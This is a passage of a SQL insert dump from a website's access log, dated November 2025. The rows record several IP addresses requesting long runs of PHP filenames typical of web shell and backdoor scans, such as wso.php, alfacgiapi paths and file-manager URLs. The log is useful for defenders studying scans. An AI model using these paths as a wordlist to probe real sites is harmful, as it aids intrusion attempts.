09:07:44'),(4709,'https://amb18b.com/404.php?fm=true','172.207.9.124','Direct Access',1,'2025-11-08 09:07:46','2025-11-08 09:07:46'),(4710,'https://amb18b.com/ini.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:47','2025-11-08 09:07:47'),(4711,'https://amb18b.com/fm.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:48','2025-11-08 09:07:48'),(4712,'https://amb18b.com/atomlib.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:50','2025-11-08 09:07:50'),(4713,'https://amb18b.com/inputs.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:51','2025-11-08 09:07:51'),(4714,'https://amb18b.com/moon.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:52','2025-11-08 09:07:52'),(4715,'https://amb18b.com/lv.php','172.207.9.124','Direct Access',2,'2025-11-08 09:08:46','2025-11-08 09:07:53'),(4716,'https://amb18b.com/cong.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:55','2025-11-08 09:07:55'),(4717,'https://amb18b.com/buy.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:58','2025-11-08 09:07:58'),(4718,'https://amb18b.com/zfile.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:59','2025-11-08 09:07:59'),(4719,'https://amb18b.com/css.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:01','2025-11-08 09:08:01'),(4720,'https://amb18b.com/radio.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:03','2025-11-08 09:08:03'),(4721,'https://amb18b.com/wp.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:04','2025-11-08 09:08:04'),(4722,'https://amb18b.com/abcd.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:06','2025-11-08 09:08:06'),(4723,'https://amb18b.com/nc4.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:08','2025-11-08 09:08:08'),(4724,'https://amb18b.com/wso.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:09','2025-11-08 09:08:09'),(4725,'https://amb18b.com/rss.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:11','2025-11-08 09:08:11'),(4726,'https://amb18b.com/ant.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:12','2025-11-08 09:08:12'),(4727,'https://amb18b.com/ioxi-o.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:14','2025-11-08 09:08:14'),(4728,'https://amb18b.com/wpc.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:08:16','2025-11-08 09:08:16'),(4729,'https://amb18b.com/js.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:17','2025-11-08 09:08:17'),(4730,'https://amb18b.com/ar.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:19','2025-11-08 09:08:19'),(4731,'https://amb18b.com/xmrlpc.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:08:20','2025-11-08 09:08:20'),(4732,'https://amb18b.com/c.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:21','2025-11-08 09:08:21'),(4733,'https://amb18b.com/byp.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:22','2025-11-08 09:08:22'),(4734,'https://amb18b.com/fm1.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:24','2025-11-08 09:08:24'),(4735,'https://amb18b.com/doc.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:25','2025-11-08 09:08:25'),(4736,'https://amb18b.com/Angelv2.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:28','2025-11-08 09:08:28'),(4737,'https://amb18b.com/acp.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:30','2025-11-08 09:08:30'),(4738,'https://amb18b.com/gdn.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:31','2025-11-08 09:08:31'),(4739,'https://amb18b.com/asas.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:33','2025-11-08 09:08:33'),(4740,'https://amb18b.com/123.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:34','2025-11-08 09:08:34'),(4741,'https://amb18b.com/v1.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:35','2025-11-08 09:08:35'),(4742,'https://amb18b.com/v2.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:37','2025-11-08 09:08:37'),(4743,'https://amb18b.com/rk2.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:38','2025-11-08 09:08:38'),(4744,'https://amb18b.com/222.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:08:39','2025-11-08 09:08:39'),(4745,'https://amb18b.com/wp-22.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:41','2025-11-08 09:08:41'),(4746,'https://amb18b.com/lc.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:42','2025-11-08 09:08:42'),(4747,'https://amb18b.com/mini.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:44','2025-11-08 09:08:44'),(4748,'https://amb18b.com/m.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:50','2025-11-08 09:08:50'),(4749,'https://amb18b.com/db.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:52','2025-11-08 09:08:52'),(4750,'https://amb18b.com/aks.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:55','2025-11-08 09:08:55'),(4751,'https://amb18b.com/f.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:56','2025-11-08 09:08:56'),(4752,'https://amb18b.com/wp-files.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:58','2025-11-08 09:08:58'),(4753,'https://amb18b.com/cloud.php','172.207.9.124','Direct Access',1,'2025-11-08 09:08:59','2025-11-08 09:08:59'),(4754,'https://amb18b.com/asa.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:02','2025-11-08 09:09:02'),(4755,'https://amb18b.com/gecko-litespeed.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:05','2025-11-08 09:09:05'),(4756,'https://amb18b.com/bolt.php','172.207.9.124','Direct Access',2,'2025-11-08 09:09:52','2025-11-08 09:09:06'),(4757,'https://amb18b.com/NewFile.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:08','2025-11-08 09:09:08'),(4758,'https://amb18b.com/otuz1.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:10','2025-11-08 09:09:10'),(4759,'https://amb18b.com/classwithtostring.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:09:13','2025-11-08 09:09:13'),(4760,'https://amb18b.com/info.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:15','2025-11-08 09:09:15'),(4761,'https://amb18b.com/mlex.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:16','2025-11-08 09:09:16'),(4762,'https://amb18b.com/file1.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:18','2025-11-08 09:09:18'),(4763,'https://amb18b.com/11.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:19','2025-11-08 09:09:19'),(4764,'https://amb18b.com/warm.PhP7','172.207.9.124','Direct Access',1,'2025-11-08 09:09:21','2025-11-08 09:09:21'),(4765,'https://amb18b.com/zxl.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:22','2025-11-08 09:09:22'),(4766,'https://amb18b.com/wp-wso.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:24','2025-11-08 09:09:24'),(4767,'https://amb18b.com/uana.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:25','2025-11-08 09:09:25'),(4768,'https://amb18b.com/a.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:28','2025-11-08 09:09:28'),(4769,'https://amb18b.com/ayk.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:29','2025-11-08 09:09:29'),(4770,'https://amb18b.com/gawean.PhP7','172.207.9.124','Direct Access',1,'2025-11-08 09:09:31','2025-11-08 09:09:31'),(4771,'https://amb18b.com/inc.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:32','2025-11-08 09:09:32'),(4772,'https://amb18b.com/api.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:34','2025-11-08 09:09:34'),(4773,'https://amb18b.com/ioxi-rex4.php7','172.207.9.124','Direct Access',1,'2025-11-08 09:09:35','2025-11-08 09:09:35'),(4774,'https://amb18b.com/million.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:37','2025-11-08 09:09:37'),(4775,'https://amb18b.com/include.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:38','2025-11-08 09:09:38'),(4776,'https://amb18b.com/bala.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:39','2025-11-08 09:09:39'),(4777,'https://amb18b.com/category.tokens.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:40','2025-11-08 09:09:40'),(4778,'https://amb18b.com/mari.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:42','2025-11-08 09:09:42'),(4779,'https://amb18b.com/json.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:43','2025-11-08 09:09:43'),(4780,'https://amb18b.com/new.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:44','2025-11-08 09:09:44'),(4781,'https://amb18b.com/woh.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:45','2025-11-08 09:09:45'),(4782,'https://amb18b.com/admin-ajax.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:47','2025-11-08 09:09:47'),(4783,'https://amb18b.com/wp_mna.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:48','2025-11-08 09:09:48'),(4784,'https://amb18b.com/dex.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:49','2025-11-08 09:09:49'),(4785,'https://amb18b.com/file5.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:50','2025-11-08 09:09:50'),(4786,'https://amb18b.com/flower.php','172.207.9.124','Direct Access',1,'2025-11-08 09:09:54','2025-11-08 09:09:54'),(4787,'https://amb18b.com/sitemap.xml','101.199.254.199','Direct Access',1,'2025-11-08 09:13:07','2025-11-08 09:13:07'),(4788,'https://amb18b.com/config.json','101.199.254.198','Direct Access',1,'2025-11-08 09:13:21','2025-11-08 09:13:21'),(4789,'https://amb18b.com/postnews.php','136.144.19.4','Direct Access',1,'2025-11-08 09:53:08','2025-11-08 09:53:08'),(4790,'https://amb18b.com/wp-admin/postnews.php','216.24.219.202','Direct Access',1,'2025-11-08 09:53:13','2025-11-08 09:53:13'),(4791,'https://amb18b.com/qa.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:10','2025-11-08 14:19:10'),(4792,'https://amb18b.com/chosen.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:15','2025-11-08 14:19:15'),(4793,'https://amb18b.com/.well-known/acme-challenge/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:17','2025-11-08 14:19:17'),(4794,'https://amb18b.com/wxo.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:19','2025-11-08 14:19:19'),(4795,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','52.178.179.147','Direct Access',1,'2025-11-08 14:19:21','2025-11-08 14:19:21'),(4796,'https://amb18b.com/wp-includes/fonts/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:23','2025-11-08 14:19:23'),(4797,'https://amb18b.com/wp-includes/images/wp-login.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:25','2025-11-08 14:19:25'),(4798,'https://amb18b.com/02.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:27','2025-11-08 14:19:27'),(4799,'https://amb18b.com/abcd.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:30','2025-11-08 14:19:30'),(4800,'https://amb18b.com/error.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:32','2025-11-08 14:19:32'),(4801,'https://amb18b.com/yy.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:34','2025-11-08 14:19:34'),(4802,'https://amb18b.com/.well-known/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:36','2025-11-08 14:19:36'),(4803,'https://amb18b.com/.well-known/acme-challenge/LA.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:38','2025-11-08 14:19:38'),(4804,'https://amb18b.com/6.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:40','2025-11-08 14:19:40'),(4805,'https://amb18b.com/class.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:42','2025-11-08 14:19:42'),(4806,'https://amb18b.com/mail.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:44','2025-11-08 14:19:44'),(4807,'https://amb18b.com/lv.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:46','2025-11-08 14:19:46'),(4808,'https://amb18b.com/zwso.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:49','2025-11-08 14:19:49'),(4809,'https://amb18b.com/filemanager/dialog.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:52','2025-11-08 14:19:52'),(4810,'https://amb18b.com/r.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:54','2025-11-08 14:19:54'),(4811,'https://amb18b.com/admin/function.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:57','2025-11-08 14:19:57'),(4812,'https://amb18b.com/js/fm.php','52.178.179.147','Direct Access',1,'2025-11-08 14:19:59','2025-11-08 14:19:59'),(4813,'https://amb18b.com/buy.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:02','2025-11-08 14:20:02'),(4814,'https://amb18b.com/s.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:04','2025-11-08 14:20:04'),(4815,'https://amb18b.com/akcc.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:05','2025-11-08 14:20:05'),(4816,'https://amb18b.com/qing.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:08','2025-11-08 14:20:08'),(4817,'https://amb18b.com/w.php?p=','52.178.179.147','Direct Access',1,'2025-11-08 14:20:10','2025-11-08 14:20:10'),(4818,'https://amb18b.com/wp-admin/images/singlep.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:12','2025-11-08 14:20:12'),(4819,'https://amb18b.com/.well-known/pki-validation/alfacgiapi/wawe_gH298.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:15','2025-11-08 14:20:15'),(4820,'https://amb18b.com/class20.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:18','2025-11-08 14:20:18'),(4821,'https://amb18b.com/vendor/nikic/php-parser/parser.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:20','2025-11-08 14:20:20'),(4822,'https://amb18b.com/upload/wp-info.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:22','2025-11-08 14:20:22'),(4823,'https://amb18b.com/wp-includes/assets/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:26','2025-11-08 14:20:26'),(4824,'https://amb18b.com/cf.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:28','2025-11-08 14:20:28'),(4825,'https://amb18b.com/bak.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:30','2025-11-08 14:20:30'),(4826,'https://amb18b.com/AxAo.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:32','2025-11-08 14:20:32'),(4827,'https://amb18b.com/worksec.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:36','2025-11-08 14:20:36'),(4828,'https://amb18b.com/chosen.php?','52.178.179.147','Direct Access',1,'2025-11-08 14:20:38','2025-11-08 14:20:38'),(4829,'https://amb18b.com/sx.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:40','2025-11-08 14:20:40'),(4830,'https://amb18b.com/minik.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:43','2025-11-08 14:20:43'),(4831,'https://amb18b.com/d2.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:45','2025-11-08 14:20:45'),(4832,'https://amb18b.com/index/function.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:50','2025-11-08 14:20:50'),(4833,'https://amb18b.com/456.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:52','2025-11-08 14:20:52'),(4834,'https://amb18b.com/wp-includes/block-patterns/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:54','2025-11-08 14:20:54'),(4835,'https://amb18b.com/wp-gr.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:57','2025-11-08 14:20:57'),(4836,'https://amb18b.com/admin/upload/css.php','52.178.179.147','Direct Access',1,'2025-11-08 14:20:59','2025-11-08 14:20:59'),(4837,'https://amb18b.com/berlin.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:02','2025-11-08 14:21:02'),(4838,'https://amb18b.com/themes.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:04','2025-11-08 14:21:04'),(4839,'https://amb18b.com/css/index.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:06','2025-11-08 14:21:06'),(4840,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:08','2025-11-08 14:21:08'),(4841,'https://amb18b.com/13k.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:10','2025-11-08 14:21:10'),(4842,'https://amb18b.com/web/wp-login.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:13','2025-11-08 14:21:13'),(4843,'https://amb18b.com/c.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:15','2025-11-08 14:21:15'),(4844,'https://amb18b.com/ioxi002.PhP7','52.178.179.147','Direct Access',1,'2025-11-08 14:21:18','2025-11-08 14:21:18'),(4845,'https://amb18b.com/file.php?','52.178.179.147','Direct Access',1,'2025-11-08 14:21:20','2025-11-08 14:21:20'),(4846,'https://amb18b.com/info/info.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:21','2025-11-08 14:21:21'),(4847,'https://amb18b.com/.well-known/log.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:23','2025-11-08 14:21:23'),(4848,'https://amb18b.com/uwu2.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:25','2025-11-08 14:21:25'),(4849,'https://amb18b.com/filename.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:27','2025-11-08 14:21:27'),(4850,'https://amb18b.com/20.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:28','2025-11-08 14:21:28'),(4851,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:30','2025-11-08 14:21:30'),(4852,'https://amb18b.com/wp-includes/widgets//include.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:32','2025-11-08 14:21:32'),(4853,'https://amb18b.com/jp.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:34','2025-11-08 14:21:34'),(4854,'https://amb18b.com/wp-2019.php?','52.178.179.147','Direct Access',1,'2025-11-08 14:21:36','2025-11-08 14:21:36'),(4855,'https://amb18b.com/fw.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:38','2025-11-08 14:21:38'),(4856,'https://amb18b.com/a.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:41','2025-11-08 14:21:41'),(4857,'https://amb18b.com/manager.php?p=','52.178.179.147','Direct Access',1,'2025-11-08 14:21:43','2025-11-08 14:21:43'),(4858,'https://amb18b.com/a1.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:45','2025-11-08 14:21:45'),(4859,'https://amb18b.com/inputs.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:47','2025-11-08 14:21:47'),(4860,'https://amb18b.com/wp-includes/theme-compat/chosen.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:49','2025-11-08 14:21:49'),(4861,'https://amb18b.com/w.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:52','2025-11-08 14:21:52'),(4862,'https://amb18b.com/7.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:54','2025-11-08 14:21:54'),(4863,'https://amb18b.com/V3.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:56','2025-11-08 14:21:56'),(4864,'https://amb18b.com/config.php','52.178.179.147','Direct Access',1,'2025-11-08 14:21:58','2025-11-08 14:21:58'),(4865,'https://amb18b.com/qa.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:02','2025-11-08 14:41:02'),(4866,'https://amb18b.com/chosen.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:06','2025-11-08 14:41:06'),(4867,'https://amb18b.com/.well-known/acme-challenge/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:08','2025-11-08 14:41:08'),(4868,'https://amb18b.com/wxo.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:09','2025-11-08 14:41:09'),(4869,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','40.122.52.254','Direct Access',1,'2025-11-08 14:41:11','2025-11-08 14:41:11'),(4870,'https://amb18b.com/wp-includes/fonts/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:13','2025-11-08 14:41:13'),(4871,'https://amb18b.com/wp-includes/images/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:15','2025-11-08 14:41:15'),(4872,'https://amb18b.com/02.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:17','2025-11-08 14:41:17'),(4873,'https://amb18b.com/abcd.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:18','2025-11-08 14:41:18'),(4874,'https://amb18b.com/error.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:20','2025-11-08 14:41:20'),(4875,'https://amb18b.com/yy.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:22','2025-11-08 14:41:22'),(4876,'https://amb18b.com/.well-known/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:24','2025-11-08 14:41:24'),(4877,'https://amb18b.com/.well-known/acme-challenge/LA.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:25','2025-11-08 14:41:25'),(4878,'https://amb18b.com/6.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:27','2025-11-08 14:41:27'),(4879,'https://amb18b.com/class.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:29','2025-11-08 14:41:29'),(4880,'https://amb18b.com/mail.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:31','2025-11-08 14:41:31'),(4881,'https://amb18b.com/lv.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:33','2025-11-08 14:41:33'),(4882,'https://amb18b.com/zwso.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:35','2025-11-08 14:41:35'),(4883,'https://amb18b.com/filemanager/dialog.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:37','2025-11-08 14:41:37'),(4884,'https://amb18b.com/r.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:39','2025-11-08 14:41:39'),(4885,'https://amb18b.com/admin/function.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:40','2025-11-08 14:41:40'),(4886,'https://amb18b.com/js/fm.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:42','2025-11-08 14:41:42'),(4887,'https://amb18b.com/buy.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:44','2025-11-08 14:41:44'),(4888,'https://amb18b.com/s.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:46','2025-11-08 14:41:46'),(4889,'https://amb18b.com/akcc.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:48','2025-11-08 14:41:48'),(4890,'https://amb18b.com/qing.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:50','2025-11-08 14:41:50'),(4891,'https://amb18b.com/w.php?p=','40.122.52.254','Direct Access',1,'2025-11-08 14:41:52','2025-11-08 14:41:52'),(4892,'https://amb18b.com/wp-admin/images/singlep.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:54','2025-11-08 14:41:54'),(4893,'https://amb18b.com/.well-known/pki-validation/alfacgiapi/wawe_gH298.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:56','2025-11-08 14:41:56'),(4894,'https://amb18b.com/class20.php','40.122.52.254','Direct Access',1,'2025-11-08 14:41:58','2025-11-08 14:41:58'),(4895,'https://amb18b.com/vendor/nikic/php-parser/parser.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:00','2025-11-08 14:42:00'),(4896,'https://amb18b.com/upload/wp-info.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:01','2025-11-08 14:42:01'),(4897,'https://amb18b.com/wp-includes/assets/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:05','2025-11-08 14:42:05'),(4898,'https://amb18b.com/cf.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:07','2025-11-08 14:42:07'),(4899,'https://amb18b.com/bak.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:09','2025-11-08 14:42:09'),(4900,'https://amb18b.com/AxAo.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:10','2025-11-08 14:42:10'),(4901,'https://amb18b.com/worksec.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:12','2025-11-08 14:42:12'),(4902,'https://amb18b.com/chosen.php?','40.122.52.254','Direct Access',1,'2025-11-08 14:42:15','2025-11-08 14:42:15'),(4903,'https://amb18b.com/sx.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:17','2025-11-08 14:42:17'),(4904,'https://amb18b.com/minik.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:19','2025-11-08 14:42:19'),(4905,'https://amb18b.com/d2.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:21','2025-11-08 14:42:21'),(4906,'https://amb18b.com/index/function.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:25','2025-11-08 14:42:25'),(4907,'https://amb18b.com/456.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:27','2025-11-08 14:42:27'),(4908,'https://amb18b.com/wp-includes/block-patterns/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:29','2025-11-08 14:42:29'),(4909,'https://amb18b.com/wp-gr.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:31','2025-11-08 14:42:31'),(4910,'https://amb18b.com/admin/upload/css.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:32','2025-11-08 14:42:32'),(4911,'https://amb18b.com/berlin.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:34','2025-11-08 14:42:34'),(4912,'https://amb18b.com/themes.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:36','2025-11-08 14:42:36'),(4913,'https://amb18b.com/css/index.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:38','2025-11-08 14:42:38'),(4914,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:40','2025-11-08 14:42:40'),(4915,'https://amb18b.com/13k.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:42','2025-11-08 14:42:42'),(4916,'https://amb18b.com/web/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:43','2025-11-08 14:42:43'),(4917,'https://amb18b.com/c.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:45','2025-11-08 14:42:45'),(4918,'https://amb18b.com/ioxi002.PhP7','40.122.52.254','Direct Access',1,'2025-11-08 14:42:47','2025-11-08 14:42:47'),(4919,'https://amb18b.com/file.php?','40.122.52.254','Direct Access',1,'2025-11-08 14:42:49','2025-11-08 14:42:49'),(4920,'https://amb18b.com/info/info.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:51','2025-11-08 14:42:51'),(4921,'https://amb18b.com/.well-known/log.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:54','2025-11-08 14:42:54'),(4922,'https://amb18b.com/uwu2.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:55','2025-11-08 14:42:55'),(4923,'https://amb18b.com/filename.php','40.122.52.254','Direct Access',1,'2025-11-08 14:42:57','2025-11-08 14:42:57'),(4924,'https://amb18b.com/20.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:00','2025-11-08 14:43:00'),(4925,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:01','2025-11-08 14:43:01'),(4926,'https://amb18b.com/wp-includes/widgets//include.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:03','2025-11-08 14:43:03'),(4927,'https://amb18b.com/jp.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:05','2025-11-08 14:43:05'),(4928,'https://amb18b.com/wp-2019.php?','40.122.52.254','Direct Access',1,'2025-11-08 14:43:07','2025-11-08 14:43:07'),(4929,'https://amb18b.com/fw.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:09','2025-11-08 14:43:09'),(4930,'https://amb18b.com/a.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:11','2025-11-08 14:43:11'),(4931,'https://amb18b.com/manager.php?p=','40.122.52.254','Direct Access',1,'2025-11-08 14:43:13','2025-11-08 14:43:13'),(4932,'https://amb18b.com/a1.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:14','2025-11-08 14:43:14'),(4933,'https://amb18b.com/inputs.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:16','2025-11-08 14:43:16'),(4934,'https://amb18b.com/wp-includes/theme-compat/chosen.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:18','2025-11-08 14:43:18'),(4935,'https://amb18b.com/w.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:20','2025-11-08 14:43:20'),(4936,'https://amb18b.com/7.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:22','2025-11-08 14:43:22'),(4937,'https://amb18b.com/V3.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:24','2025-11-08 